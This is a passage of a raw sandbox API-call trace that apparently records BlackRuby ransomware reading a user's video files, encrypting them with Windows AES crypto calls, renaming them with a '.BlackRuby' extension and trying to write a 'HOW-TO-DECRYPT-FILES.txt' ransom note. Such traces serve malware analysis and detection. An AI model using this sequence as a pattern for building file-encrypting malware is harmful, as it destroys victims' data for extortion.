ftLastWriteTime.dwHighDateTime=0x1d34f67, nFileSizeHigh=0x0, nFileSizeLow=0x5e1c)) returned 1 [0062.494] GetLastError () returned 0x0 [0062.494] SetErrorMode (uMode=0x0) returned 0x1 [0062.505] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c97484, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360c20) returned 1 [0062.505] GetLastError () returned 0x0 [0062.505] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.505] GetLastError () returned 0x0 [0062.510] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.510] GetLastError () returned 0x0 [0062.510] CryptDuplicateKey (in: hKey=0x360c20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360ae0) returned 1 [0062.510] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.510] GetLastError () returned 0x0 [0062.510] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x4, pbData=0x1cc44d0*=0x1, dwFlags=0x0) returned 1 [0062.510] GetLastError () returned 0x0 [0062.510] CryptSetKeyParam (hKey=0x360ae0, dwParam=0x1, pbData=0x1cc449c, dwFlags=0x0) returned 1 [0062.510] GetLastError () returned 0x0 [0062.510] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cc4518*, pdwDataLen=0x18ec9c*=0x5f10, dwBufLen=0x5f10 | out: pbData=0x1cc4518*, pdwDataLen=0x18ec9c*=0x5f10) returned 1 [0062.510] GetLastError () returned 0x0 [0062.510] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1cd0364*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1cd0364*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0062.510] GetLastError () returned 0x0 [0062.511] CryptEncrypt (in: hKey=0x360ae0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1cd0394*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1cd0394*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0062.511] GetLastError () returned 0x0 [0062.511] CryptDestroyKey (hKey=0x360c20) returned 1 [0062.511] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.511] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.511] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi", lpFilePart=0x0) returned 0x54 [0062.511] GetLastError () returned 0x0 [0062.511] SetErrorMode (uMode=0x1) returned 0x0 [0062.512] GetFileType (hFile=0x258) returned 0x1 [0062.512] SetErrorMode (uMode=0x0) returned 0x1 [0062.512] GetFileType (hFile=0x258) returned 0x1 [0062.512] WriteFile (in: hFile=0x258, lpBuffer=0x1cdc1f0*, nNumberOfBytesToWrite=0x5f20, lpNumberOfBytesWritten=0x18ecb8, lpOverlapped=0x0 | out: lpBuffer=0x1cdc1f0*, lpNumberOfBytesWritten=0x18ecb8*=0x5f20, lpOverlapped=0x0) returned 1 [0062.513] GetLastError () returned 0xb7 [0062.513] CloseHandle (hObject=0x258) returned 1 [0062.513] GetLastError () returned 0xb7 [0062.513] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi", lpFilePart=0x0) returned 0x54 [0062.513] GetLastError () returned 0xb7 [0062.513] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_Wxmn5eG09aaNMv3nqNd7Qjjwz7iW0Hc4BTAVTQ.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_Wxmn5eG09aaNMv3nqNd7Qjjwz7iW0Hc4BTAVTQ.BlackRuby", lpFilePart=0x0) returned 0x77 [0062.513] GetLastError () returned 0xb7 [0062.513] SetErrorMode (uMode=0x1) returned 0x0 [0062.513] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\h1cquyyg85mqup3hbyo.avi"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x763b9b30, ftCreationTime.dwHighDateTime=0x1d34b49, ftLastAccessTime.dwLowDateTime=0xe3211be0, ftLastAccessTime.dwHighDateTime=0x1d34f67, ftLastWriteTime.dwLowDateTime=0x2d755700, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x5f20)) returned 1 [0062.513] GetLastError () returned 0xb7 [0062.513] SetErrorMode (uMode=0x0) returned 0x1 [0062.513] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\H1cquyyg85mqUP3HBYo.avi" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\h1cquyyg85mqup3hbyo.avi"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_Wxmn5eG09aaNMv3nqNd7Qjjwz7iW0Hc4BTAVTQ.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\encrypted_wxmn5eg09aanmv3nqnd7qjjwz7iw0hc4btavtq.blackruby")) returned 1 [0062.514] GetLastError () returned 0xb7 [0062.515] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x55 [0062.515] GetLastError () returned 0xb7 [0062.515] SetErrorMode (uMode=0x1) returned 0x0 [0062.515] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0062.515] GetLastError () returned 0x5 [0062.516] SetErrorMode (uMode=0x0) returned 0x1 [0062.516] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv", lpFilePart=0x0) returned 0x47 [0062.516] GetLastError () returned 0x5 [0062.516] SetErrorMode (uMode=0x1) returned 0x0 [0062.517] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\kp10co.flv"), fInfoLevelId=0x0, lpFileInformation=0x1cff620 | out: lpFileInformation=0x1cff620*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc025ae20, ftCreationTime.dwHighDateTime=0x1d34dc4, ftLastAccessTime.dwLowDateTime=0xc6946b60, ftLastAccessTime.dwHighDateTime=0x1d35595, ftLastWriteTime.dwLowDateTime=0xc6946b60, ftLastWriteTime.dwHighDateTime=0x1d35595, nFileSizeHigh=0x0, nFileSizeLow=0x4ea5)) returned 1 [0062.517] GetLastError () returned 0x5 [0062.517] SetErrorMode (uMode=0x0) returned 0x1 [0062.517] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv", lpFilePart=0x0) returned 0x47 [0062.517] GetLastError () returned 0x5 [0062.517] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv", lpFilePart=0x0) returned 0x47 [0062.517] GetLastError () returned 0x5 [0062.517] SetErrorMode (uMode=0x1) returned 0x0 [0062.517] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\kp10co.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.517] GetLastError () returned 0x0 [0062.517] GetFileType (hFile=0x258) returned 0x1 [0062.517] SetErrorMode (uMode=0x0) returned 0x1 [0062.517] GetFileType (hFile=0x258) returned 0x1 [0062.517] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0x4ea5 [0062.517] GetLastError () returned 0x0 [0062.517] ReadFile (in: hFile=0x258, lpBuffer=0x1d01308, nNumberOfBytesToRead=0x4ea5, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1d01308*, lpNumberOfBytesRead=0x18ecac*=0x4ea5, lpOverlapped=0x0) returned 1 [0062.519] GetLastError () returned 0x0 [0062.519] CloseHandle (hObject=0x258) returned 1 [0062.519] GetLastError () returned 0x0 [0062.519] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv", lpFilePart=0x0) returned 0x47 [0062.519] GetLastError () returned 0x0 [0062.519] SetErrorMode (uMode=0x1) returned 0x0 [0062.519] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\kp10co.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc025ae20, ftCreationTime.dwHighDateTime=0x1d34dc4, ftLastAccessTime.dwLowDateTime=0xc6946b60, ftLastAccessTime.dwHighDateTime=0x1d35595, ftLastWriteTime.dwLowDateTime=0xc6946b60, ftLastWriteTime.dwHighDateTime=0x1d35595, nFileSizeHigh=0x0, nFileSizeLow=0x4ea5)) returned 1 [0062.519] GetLastError () returned 0x0 [0062.519] SetErrorMode (uMode=0x0) returned 0x1 [0062.519] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c680) returned 1 [0062.520] GetLastError () returned 0x0 [0062.557] CryptImportKey (in: hProv=0x37c680, pbData=0x1b6ae84, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360ce0) returned 1 [0062.557] GetLastError () returned 0x0 [0062.557] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.557] GetLastError () returned 0x0 [0062.562] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.562] GetLastError () returned 0x0 [0062.562] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360f60) returned 1 [0062.562] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.562] GetLastError () returned 0x0 [0062.562] CryptSetKeyParam (hKey=0x360f60, dwParam=0x4, pbData=0x1b97ed0*=0x1, dwFlags=0x0) returned 1 [0062.562] GetLastError () returned 0x0 [0062.562] CryptSetKeyParam (hKey=0x360f60, dwParam=0x1, pbData=0x1b97e9c, dwFlags=0x0) returned 1 [0062.562] GetLastError () returned 0x0 [0062.562] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b97f18*, pdwDataLen=0x18ec9c*=0x4fa0, dwBufLen=0x4fa0 | out: pbData=0x1b97f18*, pdwDataLen=0x18ec9c*=0x4fa0) returned 1 [0062.562] GetLastError () returned 0x0 [0062.562] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1ba1e84*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1ba1e84*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0062.562] GetLastError () returned 0x0 [0062.562] CryptEncrypt (in: hKey=0x360f60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1ba1eb4*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1ba1eb4*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0062.562] GetLastError () returned 0x0 [0062.562] CryptDestroyKey (hKey=0x360ce0) returned 1 [0062.562] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.562] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0062.562] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv", lpFilePart=0x0) returned 0x47 [0062.562] GetLastError () returned 0x0 [0062.562] SetErrorMode (uMode=0x1) returned 0x0 [0062.562] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\kp10co.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.564] GetLastError () returned 0xb7 [0062.564] GetFileType (hFile=0x258) returned 0x1 [0062.564] SetErrorMode (uMode=0x0) returned 0x1 [0062.564] GetFileType (hFile=0x258) returned 0x1 [0062.567] CloseHandle (hObject=0x258) returned 1 [0062.567] GetLastError () returned 0xb7 [0062.567] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv", lpFilePart=0x0) returned 0x47 [0062.567] GetLastError () returned 0xb7 [0062.567] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_cdOmAXoyZQngUdOp5DeD2yYyvlv68jmWxIVBakw8.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_cdOmAXoyZQngUdOp5DeD2yYyvlv68jmWxIVBakw8.BlackRuby", lpFilePart=0x0) returned 0x79 [0062.567] GetLastError () returned 0xb7 [0062.567] SetErrorMode (uMode=0x1) returned 0x0 [0062.567] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\kp10co.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ecfc | out: lpFileInformation=0x18ecfc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc025ae20, ftCreationTime.dwHighDateTime=0x1d34dc4, ftLastAccessTime.dwLowDateTime=0xc6946b60, ftLastAccessTime.dwHighDateTime=0x1d35595, ftLastWriteTime.dwLowDateTime=0x2d7c7b20, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x4fb0)) returned 1 [0062.567] GetLastError () returned 0xb7 [0062.567] SetErrorMode (uMode=0x0) returned 0x1 [0062.567] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\kP10co.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\kp10co.flv"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\Encrypted_cdOmAXoyZQngUdOp5DeD2yYyvlv68jmWxIVBakw8.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\encrypted_cdomaxoyzqngudop5ded2yyyvlv68jmwxivbakw8.blackruby")) returned 1 [0062.568] GetLastError () returned 0xb7 [0062.568] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e760, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x55 [0062.568] GetLastError () returned 0xb7 [0062.568] SetErrorMode (uMode=0x1) returned 0x0 [0062.568] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0062.568] GetLastError () returned 0x5 [0062.569] SetErrorMode (uMode=0x0) returned 0x1 [0062.569] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv", nBufferLength=0x105, lpBuffer=0x18e8b4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv", lpFilePart=0x0) returned 0x48 [0062.569] GetLastError () returned 0x5 [0062.569] SetErrorMode (uMode=0x1) returned 0x0 [0062.569] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\mg4ypmk.flv"), fInfoLevelId=0x0, lpFileInformation=0x1bce28c | out: lpFileInformation=0x1bce28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d01c0, ftCreationTime.dwHighDateTime=0x1d34d57, ftLastAccessTime.dwLowDateTime=0xc229c8c0, ftLastAccessTime.dwHighDateTime=0x1d353e9, ftLastWriteTime.dwLowDateTime=0xc229c8c0, ftLastWriteTime.dwHighDateTime=0x1d353e9, nFileSizeHigh=0x0, nFileSizeLow=0xb955)) returned 1 [0062.569] GetLastError () returned 0x5 [0062.569] SetErrorMode (uMode=0x0) returned 0x1 [0062.569] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv", nBufferLength=0x105, lpBuffer=0x18e87c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv", lpFilePart=0x0) returned 0x48 [0062.569] GetLastError () returned 0x5 [0062.570] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv", nBufferLength=0x105, lpBuffer=0x18e750, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv", lpFilePart=0x0) returned 0x48 [0062.570] GetLastError () returned 0x5 [0062.570] SetErrorMode (uMode=0x1) returned 0x0 [0062.570] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\mg4ypmk.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0062.570] GetLastError () returned 0x0 [0062.570] GetFileType (hFile=0x258) returned 0x1 [0062.570] SetErrorMode (uMode=0x0) returned 0x1 [0062.570] GetFileType (hFile=0x258) returned 0x1 [0062.570] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ed04 | out: lpFileSizeHigh=0x18ed04*=0x0) returned 0xb955 [0062.570] GetLastError () returned 0x0 [0062.570] ReadFile (in: hFile=0x258, lpBuffer=0x1bd04a8, nNumberOfBytesToRead=0xb955, lpNumberOfBytesRead=0x18ecac, lpOverlapped=0x0 | out: lpBuffer=0x1bd04a8*, lpNumberOfBytesRead=0x18ecac*=0xb955, lpOverlapped=0x0) returned 1 [0062.571] GetLastError () returned 0x0 [0062.571] CloseHandle (hObject=0x258) returned 1 [0062.571] GetLastError () returned 0x0 [0062.571] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv", nBufferLength=0x105, lpBuffer=0x18e860, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv", lpFilePart=0x0) returned 0x48 [0062.571] GetLastError () returned 0x0 [0062.571] SetErrorMode (uMode=0x1) returned 0x0 [0062.571] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\mg4ypmk.flv"), fInfoLevelId=0x0, lpFileInformation=0x18ed14 | out: lpFileInformation=0x18ed14*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80d01c0, ftCreationTime.dwHighDateTime=0x1d34d57, ftLastAccessTime.dwLowDateTime=0xc229c8c0, ftLastAccessTime.dwHighDateTime=0x1d353e9, ftLastWriteTime.dwLowDateTime=0xc229c8c0, ftLastWriteTime.dwHighDateTime=0x1d353e9, nFileSizeHigh=0x0, nFileSizeLow=0xb955)) returned 1 [0062.571] GetLastError () returned 0x0 [0062.571] SetErrorMode (uMode=0x0) returned 0x1 [0062.571] CryptAcquireContextW (in: phProv=0x18ec74, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec74*=0x37c4e8) returned 1 [0062.571] GetLastError () returned 0x0 [0062.606] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c41b34, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ec50 | out: phKey=0x18ec50*=0x360b60) returned 1 [0062.606] GetLastError () returned 0x0 [0062.606] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.606] GetLastError () returned 0x0 [0062.611] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.611] GetLastError () returned 0x0 [0062.611] CryptDuplicateKey (in: hKey=0x360b60, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec0c | out: phKey=0x18ec0c*=0x360f20) returned 1 [0062.611] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0062.611] GetLastError () returned 0x0 [0062.611] CryptSetKeyParam (hKey=0x360f20, dwParam=0x4, pbData=0x1c6eb80*=0x1, dwFlags=0x0) returned 1 [0062.611] GetLastError () returned 0x0 [0062.611] CryptSetKeyParam (hKey=0x360f20, dwParam=0x1, pbData=0x1c6eb4c, dwFlags=0x0) returned 1 [0062.611] GetLastError () returned 0x0 [0062.611] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c6ebc8*, pdwDataLen=0x18ec9c*=0xba50, dwBufLen=0xba50 | out: pbData=0x1c6ebc8*, pdwDataLen=0x18ec9c*=0xba50) returned 1 [0062.611] GetLastError () returned 0x0 [0062.611] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c86094*, pdwDataLen=0x18ecb4*=0x10, dwBufLen=0x10 | out: pbData=0x1c86094*, pdwDataLen=0x18ecb4*=0x10) returned 1 [0062.611] GetLastError () returned 0x0 [0062.611] CryptEncrypt (in: hKey=0x360f20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c860c4*, pdwDataLen=0x18ecbc*=0x0, dwBufLen=0x10 | out: pbData=0x1c860c4*, pdwDataLen=0x18ecbc*=0x10) returned 1 [0062.611] GetLastError () returned 0x0 [0062.612] CryptDestroyKey (hKey=0x360b60) returned 1 [0062.612] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.612] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0062.612] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\mG4yPMk.flv", nBufferLength=0x105, lpBuffer=0x18e758, lpFilePart=0x0 | out: 